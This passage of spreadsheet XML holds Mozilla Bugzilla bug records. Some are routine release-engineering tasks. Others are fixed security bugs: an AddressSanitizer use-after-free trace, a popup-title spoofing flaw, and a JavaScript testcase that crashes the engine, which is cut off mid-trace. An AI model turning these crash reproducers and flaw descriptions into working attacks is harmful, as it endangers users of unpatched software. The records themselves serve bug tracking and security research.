      <c r="R4089" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4089" t="inlineStr">
        <is>
          <t>2012.10</t>
        </is>
      </c>
      <c r="T4089" t="n">
        <v>1</v>
      </c>
      <c r="U4089" t="n">
        <v>0</v>
      </c>
      <c r="V4089" t="n">
        <v>3</v>
      </c>
      <c r="W4089" t="inlineStr">
        <is>
          <t>This should happen sometime on Monday June 4th 2012
We need to remove the survey in the support.mozilla.org/kb page.
Thanks again for the super fast response.</t>
        </is>
      </c>
      <c r="X4089" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4090">
      <c r="A4090" t="n">
        <v>745536</v>
      </c>
      <c r="B4090" t="inlineStr">
        <is>
          <t>2012-04-15 06:35:49 -0700</t>
        </is>
      </c>
      <c r="C4090" t="inlineStr">
        <is>
          <t>Initial setup for aus3.mozilla.org to serve Thunderbird builds.</t>
        </is>
      </c>
      <c r="D4090" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4090" t="n">
        <v>1</v>
      </c>
      <c r="F4090" t="n">
        <v>1</v>
      </c>
      <c r="G4090" t="n">
        <v>5</v>
      </c>
      <c r="H4090" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4090" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4090" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4090" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4090" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4090" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4090" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4090" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4090" t="inlineStr"/>
      <c r="Q4090" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4090" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4090" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4090" t="n">
        <v>1</v>
      </c>
      <c r="U4090" t="n">
        <v>0</v>
      </c>
      <c r="V4090" t="n">
        <v>29</v>
      </c>
      <c r="W4090" t="inlineStr">
        <is>
          <t>* Rsync Thunderbird snippets from momo-build-adm-01.sj.mozillamessaging.com to aus3-staging.mozilla.org
* Upload new Thunderbird snippets to aus3-staging
  * we can do this anytime with the existing Thunderbird build automation - as long as it can reach FF AUS.
* Verify that upgrades work as expected.
* Point the Thunderbird AUS DNS at aus3-staging.</t>
        </is>
      </c>
      <c r="X4090" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4091">
      <c r="A4091" t="n">
        <v>401596</v>
      </c>
      <c r="B4091" t="inlineStr">
        <is>
          <t>2007-10-29 11:41:00 -0700</t>
        </is>
      </c>
      <c r="C4091" t="inlineStr">
        <is>
          <t>rename trunk release automation VMs</t>
        </is>
      </c>
      <c r="D4091" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4091" t="n">
        <v>1</v>
      </c>
      <c r="F4091" t="n">
        <v>1</v>
      </c>
      <c r="G4091" t="n">
        <v>5</v>
      </c>
      <c r="H4091" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4091" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4091" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4091" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4091" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4091" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4091" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4091" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4091" t="inlineStr"/>
      <c r="Q4091" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4091" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4091" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4091" t="n">
        <v>1</v>
      </c>
      <c r="U4091" t="n">
        <v>0</v>
      </c>
      <c r="V4091" t="n">
        <v>4</v>
      </c>
      <c r="W4091" t="inlineStr">
        <is>
          <t>Rename the trunk release automation VMs to a standard scheme. The slaves should be in the format production-platform-branch-slaveN. eg, fx-linux-1.9-slave1, fx-linux-1.9-slave2.</t>
        </is>
      </c>
      <c r="X4091" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4092">
      <c r="A4092" t="n">
        <v>812893</v>
      </c>
      <c r="B4092" t="inlineStr">
        <is>
          <t>2012-11-18 09:15:12 -0800</t>
        </is>
      </c>
      <c r="C4092" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsOverflowContinuationTracker::Finish, with -moz-columns</t>
        </is>
      </c>
      <c r="D4092" t="inlineStr">
        <is>
          <t>2024-05-30 07:51:57 -0700</t>
        </is>
      </c>
      <c r="E4092" t="n">
        <v>1</v>
      </c>
      <c r="F4092" t="n">
        <v>1</v>
      </c>
      <c r="G4092" t="n">
        <v>3</v>
      </c>
      <c r="H4092" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4092" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4092" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4092" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4092" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4092" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4092" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4092" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4092" t="inlineStr">
        <is>
          <t>[asan][bug 724978 might fix][adv-main19+][adv-esr1703+]</t>
        </is>
      </c>
      <c r="Q4092" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4092" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4092" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T4092" t="n">
        <v>1</v>
      </c>
      <c r="U4092" t="n">
        <v>0</v>
      </c>
      <c r="V4092" t="n">
        <v>39</v>
      </c>
      <c r="W4092" t="inlineStr">
        <is>
          <t>Created attachment 682899
Testcase
Reproduces on trunk.
=================================================================
==3869== ERROR: AddressSanitizer: heap-use-after-free on address 0x7facf171c940 at pc 0x7fad10189afe bp 0x7fff43a32a90 sp 0x7fff43a32a88
READ of size 8 at 0x7facf171c940 thread T0
    #0 0x7fad10189afd in nsFrameList::FirstChild() const src/layout/base/../generic/nsFrameList.h:214
    #1 0x7fad10a06005 in nsOverflowContinuationTracker::Finish(nsIFrame*) src/layout/generic/nsContainerFrame.cpp:1719
    #2 0x7fad109a7a57 in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) src/layout/generic/nsBlockReflowContext.cpp:306
    #3 0x7fad10949e9d in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:3097
    #4 0x7fad1093ebe9 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:2476
    #5 0x7fad1092a670 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) src/layout/generic/nsBlockFrame.cpp:2284
    #6 0x7fad10918fe3 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1041
    #7 0x7fad10a0566c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:952
    #8 0x7fad109e6ad3 in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) src/layout/generic/nsColumnSetFrame.cpp:649
    #9 0x7fad109eeb11 in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsColumnSetFrame.cpp:1032
    #10 0x7fad109a7400 in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) src/layout/generic/nsBlockReflowContext.cpp:268
    #11 0x7fad10949e9d in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:3097
    #12 0x7fad1093ebe9 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:2476
    #13 0x7fad10925cf7 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) src/layout/generic/nsBlockFrame.cpp:1996
    #14 0x7fad10918fe3 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1041
    #15 0x7fad10a0566c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:952
    #16 0x7fad109e6ad3 in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) src/layout/generic/nsColumnSetFrame.cpp:649
    #17 0x7fad109eeb11 in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsColumnSetFrame.cpp:1032
    #18 0x7fad109a7400 in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) src/layout/generic/nsBlockReflowContext.cpp:268
    #19 0x7fad10949e9d in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:3097
    #20 0x7fad1093ebe9 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:2476
    #21 0x7fad10925cf7 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) src/layout/generic/nsBlockFrame.cpp:1996
    #22 0x7fad10918fe3 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1041
    #23 0x7fad10a0566c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:952
    #24 0x7fad109e6ad3 in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) src/layout/generic/nsColumnSetFrame.cpp:649
    #25 0x7fad109eeb11 in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsColumnSetFrame.cpp:1032
    #26 0x7fad10a0566c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:952
    #27 0x7fad10bd7066 in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsCanvasFrame.cpp:473
    #28 0x7fad10a0566c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:952
    #29 0x7fad10b4e948 in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) src/layout/generic/nsGfxScrollFrame.cpp:433
    #30 0x7fad10b534a6 in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) src/layout/generic/nsGfxScrollFrame.cpp:533
    #31 0x7fad10b57b40 in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsGfxScrollFrame.cpp:774
    #32 0x7fad10a0566c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:952
    #33 0x7fad10f4692a in ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsViewportFrame.cpp:202
    #34 0x7fad106799bb in PresShell::DoReflow(nsIFrame*, bool) src/layout/base/nsPresShell.cpp:7502
    #35 0x7fad106a906d in PresShell::ProcessReflowCommands(bool) src/layout/base/nsPresShell.cpp:7643
    #36 0x7fad106a7bbe in PresShell::FlushPendingNotifications(mozFlushType) src/layout/base/nsPresShell.cpp:3883
    #37 0x7fad1074e155 in nsRefreshDriver::Notify(nsITimer*) src/layout/base/nsRefreshDriver.cpp:403
    #38 0x7fad1cc44123 in nsTimerImpl::Fire() src/xpcom/threads/nsTimerImpl.cpp:485
    #39 0x7fad1cc454c1 in nsTimerEvent::Run() src/xpcom/threads/nsTimerImpl.cpp:565
    #40 0x7fad1cc081be in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:627
    #41 0x7fad1c87de0f in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:221
    #42 0x7fad1afe3516 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
    #43 0x7fad1cef0cce in MessageLoop::RunInternal() src/ipc/chromium/src/base/message_loop.cc:215
    #44 0x7fad1cef0b15 in MessageLoop::RunHandler() src/ipc/chromium/src/base/message_loop.cc:208
    #45 0x7fad1cef09fb in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:182
    #46 0x7fad1a3e84d4 in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #47 0x7fad18f4de12 in nsAppStartup::Run() src/toolkit/components/startup/nsAppStartup.cpp:290
    #48 0x7fad0e437f24 in XREMain::XRE_mainRun() src/toolkit/xre/nsAppRunner.cpp:3823
    #49 0x7fad0e43dbf9 in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3890
    #50 0x7fad0e440970 in XRE_main src/toolkit/xre/nsAppRunner.cpp:4084
    #51 0x40c0c6 in do_main(int, char**) src/browser/app/nsBrowserApp.cpp:174
    #52 0x409900 in main src/browser/app/nsBrowserApp.cpp:279
    #53 0x7fad2e64e76c in ?? ??:0
0x7facf171c940 is located 0 bytes inside of 16-byte region [0x7facf171c940,0x7facf171c950)
freed by thread T0 here:
    #0 0x4c3750 in __interceptor_free ??:?
    #1 0x7fad2c1dc405 in moz_free src/memory/mozalloc/mozalloc.cpp:48
    #2 0x7fad10a0da58 in operator delete(void*) src/../../dist/include/mozilla/mozalloc.h:224
    #3 0x7fad10a0cef3 in nsContainerFrame::StealFrame(nsPresContext*, nsIFrame*, bool) src/layout/generic/nsContainerFrame.cpp:1212
    #4 0x7fad10984dac in nsBlockFrame::StealFrame(nsPresContext*, nsIFrame*, bool) src/layout/generic/nsBlockFrame.cpp:5538
    #5 0x7fad10a0f51c in nsContainerFrame::DeleteNextInFlowChild(nsPresContext*, nsIFrame*, bool) src/layout/generic/nsContainerFrame.cpp:1359
    #6 0x7fad10986c30 in nsBlockFrame::DeleteNextInFlowChild(nsPresContext*, nsIFrame*, bool) src/layout/generic/nsBlockFrame.cpp:5625
    #7 0x7fad109a7ba2 in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) src/layout/generic/nsBlockReflowContext.cpp:307
    #8 0x7fad10949e9d in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:3097
    #9 0x7fad1093ebe9 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:2476
    #10 0x7fad10925cf7 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) src/layout/generic/nsBlockFrame.cpp:1996
    #11 0x7fad10918fe3 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1041
    #12 0x7fad10a0566c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:952
    #13 0x7fad109e6ad3 in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) src/layout/generic/nsColumnSetFrame.cpp:649
    #14 0x7fad109eeb11 in nsColumnSetFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsColumnSetFrame.cpp:1032
previously allocated by thread T0 here:
    #0 0x4c3810 in malloc ??:?
    #1 0x7fad2c1dc541 in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:54
    #2 0x7fad10a0b40f in operator new(unsigned long) src/../../dist/include/mozilla/mozalloc.h:200
    #3 0x7fad1094dbbe in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:3266
    #4 0x7fad1093ebe9 in nsBlockFrame::ReflowLine(nsBlockReflowState&amp;, nsLineList_iterator, bool*) src/layout/generic/nsBlockFrame.cpp:2476
    #5 0x7fad1092a670 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) src/layout/generic/nsBlockFrame.cpp:2284
    #6 0x7fad10918fe3 in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) src/layout/generic/nsBlockFrame.cpp:1041
    #7 0x7fad10a0566c in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) src/layout/generic/nsContainerFrame.cpp:952
    #8 0x7fad109e6ad3 in nsColumnSetFrame::ReflowChildren(nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;, nsColumnSetFrame::ReflowConfig const&amp;, bool, nsCollapsingMargin*, nsColumnSetFrame::ColumnBalanceData&amp;) src/layout/generic/nsColumnSetFrame.cpp:649
Shadow byte and word:
  0x1ff59e2e3928: fd
  0x1ff59e2e3928: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ff59e2e3908: 00 00 00 00 00 fb fb fb
  0x1ff59e2e3910: fa fa fa fa fa fa fa fa
  0x1ff59e2e3918: fd fd fd fd fd fd fd fd
  0x1ff59e2e3920: fa fa fa fa fa fa fa fa
=&gt;0x1ff59e2e3928: fd fd fd fd fd fd fd fd
  0x1ff59e2e3930: fa fa fa fa fa fa fa fa
  0x1ff59e2e3938: 00 00 00 00 00 00 00 00
  0x1ff59e2e3940: fa fa fa fa fa fa fa fa
  0x1ff59e2e3948: fd fd fd fd fd fd fd fd
Stats: 252M malloced (231M for red zones) by 340183 calls
Stats: 46M realloced by 17894 calls
Stats: 221M freed by 224349 calls
Stats: 186M really freed by 177540 calls
Stats: 235M (60247 full pages) mmaped in 447 calls
  mmaps   by size class: 7:102375; 8:45034; 9:13299; 10:5110; 11:8670; 12:1280; 13:960; 14:544; 15:224; 16:784; 17:460; 18:36; 19:35; 20:21;
  mallocs by size class: 7:196151; 8:83366; 9:22929; 10:9146; 11:19278; 12:2496; 13:1908; 14:1548; 15:413; 16:1467; 17:1349; 18:70; 19:40; 20:22;
  frees   by size class: 7:122554; 8:54394; 9:16555; 10:5987; 11:17304; 12:1710; 13:1495; 14:1365; 15:281; 16:1256; 17:1334; 18:57; 19:38; 20:19;
  rfrees  by size class: 7:99289; 8:43459; 9:10392; 10:4360; 11:13903; 12:1343; 13:996; 14:1255; 15:215; 16:939; 17:1297; 18:49; 19:37; 20:6;
Stats: malloc large: 3361 small slow: 4876
==3869== ABORTING</t>
        </is>
      </c>
      <c r="X4092" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4093">
      <c r="A4093" t="n">
        <v>1693664</v>
      </c>
      <c r="B4093" t="inlineStr">
        <is>
          <t>2021-02-18 14:35:41 -0800</t>
        </is>
      </c>
      <c r="C4093" t="inlineStr">
        <is>
          <t>Title of popups without location bar can fully be spoofed - title does not include the URL or extension name</t>
        </is>
      </c>
      <c r="D4093" t="inlineStr">
        <is>
          <t>2021-11-22 23:34:06 -0800</t>
        </is>
      </c>
      <c r="E4093" t="n">
        <v>1</v>
      </c>
      <c r="F4093" t="n">
        <v>1</v>
      </c>
      <c r="G4093" t="n">
        <v>2</v>
      </c>
      <c r="H4093" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4093" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4093" t="inlineStr">
        <is>
          <t>Tabbed Browser</t>
        </is>
      </c>
      <c r="K4093" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4093" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4093" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4093" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4093" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4093" t="inlineStr">
        <is>
          <t>[adv-main87+][adv-esr78.9+]</t>
        </is>
      </c>
      <c r="Q4093" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4093" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4093" t="inlineStr">
        <is>
          <t>88 Branch</t>
        </is>
      </c>
      <c r="T4093" t="n">
        <v>1</v>
      </c>
      <c r="U4093" t="n">
        <v>0</v>
      </c>
      <c r="V4093" t="n">
        <v>13</v>
      </c>
      <c r="W4093" t="inlineStr">
        <is>
          <t>bug 1621328 moved `Services.uriFixup.createExposableURI` to `Services.io.createExposableURI`, but a consumer in tabbrowser.js at `getWindowTitleForBrowser` still references the old method: https://searchfox.org/mozilla-central/rev/e84baf5c730abd453be5d50dcb0aba1e743bac47/browser/base/content/tabbrowser.js#950
The relevant logic is wrapped in a try-catch that blindly ignores errors. The impact of this is that if a page can open a popup without location bar (e.g. extensions), then an extension can spoof the full popup title, and the user wouldn't know that the popup comes from an extension.
There is a unit test that is supposedly verifying that the extension name is in the title (toolkit/components/extensions/test/browser/browser_ext_windows_popup_title.js), but that doesn't work because of a bug in it (see two comments at https://bugzilla.mozilla.org/show_bug.cgi?id=1690611#c14).
So, to fix this bug, `uriFixup` should be replaced with `io`, and the unit test (browser_ext_windows_popup_title.js) should be fixed.</t>
        </is>
      </c>
      <c r="X4093" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4094">
      <c r="A4094" t="n">
        <v>743876</v>
      </c>
      <c r="B4094" t="inlineStr">
        <is>
          <t>2012-04-09 17:18:34 -0700</t>
        </is>
      </c>
      <c r="C4094" t="inlineStr">
        <is>
          <t>Assertion failure: (ptrBits &amp; 0x7) == 0, at ../../jsval.h:763 or Crash [@ js::gc::Cell::compartment] or [@ js_GetMethod]</t>
        </is>
      </c>
      <c r="D4094" t="inlineStr">
        <is>
          <t>2013-01-19 14:21:06 -0800</t>
        </is>
      </c>
      <c r="E4094" t="n">
        <v>1</v>
      </c>
      <c r="F4094" t="n">
        <v>1</v>
      </c>
      <c r="G4094" t="n">
        <v>3</v>
      </c>
      <c r="H4094" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4094" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4094" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4094" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4094" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4094" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4094" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4094" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4094" t="inlineStr">
        <is>
          <t>[advisory-tracking+] fixed by bug 740446</t>
        </is>
      </c>
      <c r="Q4094" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4094" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4094" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4094" t="n">
        <v>1</v>
      </c>
      <c r="U4094" t="n">
        <v>0</v>
      </c>
      <c r="V4094" t="n">
        <v>15</v>
      </c>
      <c r="W4094" t="inlineStr">
        <is>
          <t>The following test asserts/crashes on mozilla-central revision 434f50e70815 (options -m -n -a):
var lfcode = new Array();
lfcode.push("3");
lfcode.push("\
evaluate(\"mjitChunkLimit(5)\");\
function slice(a, b) {\
    return slice(index, ++(ArrayBuffer));\
}\
");
lfcode.push("0");
lfcode.push("var arr = [0, 1, 2, 3, 4];\
function replacer() {\
  assertEq(arguments.length, 2);\
  var key = arguments[0], value = arguments[1];\
  return value;\
}\
assertEq(JSON.stringify(arr, replacer), '[0,1,2,3,4]');\
");
while (true) {
        var file = lfcode.shift(); if (file == undefined) { break; }
                loadFile(file);
}
function loadFile(lfVarx) {
                if (!isNaN(lfVarx)) {
                        lfRunTypeId = parseInt(lfVarx);
                } else {
                        switch (lfRunTypeId) {
                                case 0: evaluate(lfVarx); break;
                                case 3: function newFunc(x) { new Function(x)(); }; newFunc(lfVarx); break;
                }
        }
}
Crash Trace when stepping through assertion:
Program received signal SIGSEGV, Segmentation fault.
0x0000000000405350 in js::gc::Cell::compartment (this=0x7fff00000002) at ../../jsgc.h:984
984         return arenaHeader()-&gt;compartment;
(gdb) bt
#0  0x0000000000405350 in js::gc::Cell::compartment (this=0x7fff00000002) at ../../jsgc.h:984
#1  0x000000000042503f in js::CompartmentChecker::check (this=0x7fffffffa6c0, obj=0x7fff00000002) at ../jscntxtinlines.h:180
#2  0x00000000004250d6 in js::CompartmentChecker::check (this=0x7fffffffa6c0, v=...) at ../jscntxtinlines.h:190
#3  0x00000000004f5971 in js::CompartmentChecker::check (this=0x7fffffffa6c0, args=...) at ../jscntxtinlines.h:207
#4  0x0000000000510f90 in js::assertSameCompartment&lt;js::CallArgs&gt; (cx=0xb77a80, t1=...) at ../jscntxtinlines.h:254
#5  0x00000000004f59df in js::CallJSNative (cx=0xb77a80, native=0x409cca &lt;AssertEq(JSContext*, unsigned int, jsval*)&gt;, args=...) at ../jscntxtinlines.h:313
#6  0x0000000000739cd8 in js::mjit::CallCompiler::generateNativeStub (this=0x7fffffffb0a0) at /srv/repos/mozilla-central/js/src/methodjit/MonoIC.cpp:811
